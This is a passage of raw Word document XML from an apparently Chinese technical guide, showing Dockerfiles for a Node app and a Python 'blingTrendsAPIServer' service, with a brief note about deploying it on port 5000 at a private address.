          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t>CMD [“npm,”, “run”, “start-server”]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FB0EE6" w14:textId="2C081A82" w:rsidR="00F54BE4" w:rsidRDefault="00F54BE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> replace this with your application’s default port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258988D7" w14:textId="63967CB9" w:rsidR="00F54BE4" w:rsidRDefault="00F54BE4" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:t>XPOSE 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66679AFB" w14:textId="2FB18CEA" w:rsidR="00EA490A" w:rsidRDefault="00EA490A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69EB8288" w14:textId="2231BFC9" w:rsidR="00114C9B" w:rsidRDefault="00114C9B" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="139" w:name="_Toc159779600"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dockerf</w:t>
      </w:r>
      <w:r>
        <w:t>ile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：构建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>blingTrendsAPI</w:t>
      </w:r>
      <w:r>
        <w:t>Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="139"/>
    </w:p>
    <w:p w14:paraId="6A05CE22" w14:textId="77777777" w:rsidR="00114C9B" w:rsidRDefault="00114C9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C530B9C" w14:textId="77777777" w:rsidR="00B6670D" w:rsidRDefault="00B6670D" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>amd64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>alpine:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ADD </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61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>api-server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">RUN apk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">update </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp; apk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">add tzdata </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>&amp;&amp; cp /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>share</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>zoneinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Asia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Shanghai </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">localtime </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp; echo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">"Asia/Shanghai" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>&gt; /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">timezone </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp; apk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">del tzdata </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp; apk </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">add </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">update </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">no-cache python3 py3-pip </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>&amp;&amp; python3 -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">m pip install </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">r </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>api-server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>WORKDIR /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>api-server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">EXPOSE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ENTRYPOINT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"python3"</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98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"/api-server/blingTrendsAPIServer.py"</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r>
    </w:p>
    <w:p w14:paraId="56D032F3" w14:textId="77777777" w:rsidR="00114C9B" w:rsidRPr="00B6670D" w:rsidRDefault="00114C9B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="050FAF05" w14:textId="45BA150E" w:rsidR="00DF6517" w:rsidRPr="00114C9B" w:rsidRDefault="00DF6517" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D50E606" w14:textId="77777777" w:rsidR="00C13D09" w:rsidRDefault="00C13D09" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="宋体" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>推荐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dockerfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>部署，目前已部署在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>192.168.3.203:5000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>默认使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>5000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>端口，自行考虑防火墙端口开放，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ubuntu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
